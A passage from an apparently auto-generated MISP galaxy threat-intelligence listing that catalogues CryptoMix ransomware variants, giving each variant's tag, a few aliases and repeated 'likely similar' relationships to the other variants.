  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Error

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Error"

CryptoMix-Error has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Exte

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Exte"

CryptoMix-Exte has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

Cryptomix-FILE

Ransomware

The tag is: misp-galaxy:ransomware="Cryptomix-FILE"

Cryptomix-FILE has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-MOLE66

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-MOLE66"

CryptoMix-MOLE66 has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Noob

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Noob"

CryptoMix-Noob has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Ogonia

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Ogonia"

CryptoMix-Ogonia has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Pirate

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Pirate"

CryptoMix-Pirate has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Revenge

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Revenge"

CryptoMix-Revenge has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

Cryptomix-SERVER

Ransomware

The tag is: misp-galaxy:ransomware="Cryptomix-SERVER"

Cryptomix-SERVER is also known as:

  • SERVER Cryptomix

Cryptomix-SERVER has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Shark

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Shark"

CryptoMix-Shark is also known as:

  • Shark CryptoMix

CryptoMix-Shark has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-System

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-System"

CryptoMix-System is also known as:

  • System CryptoMix

CryptoMix-System has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

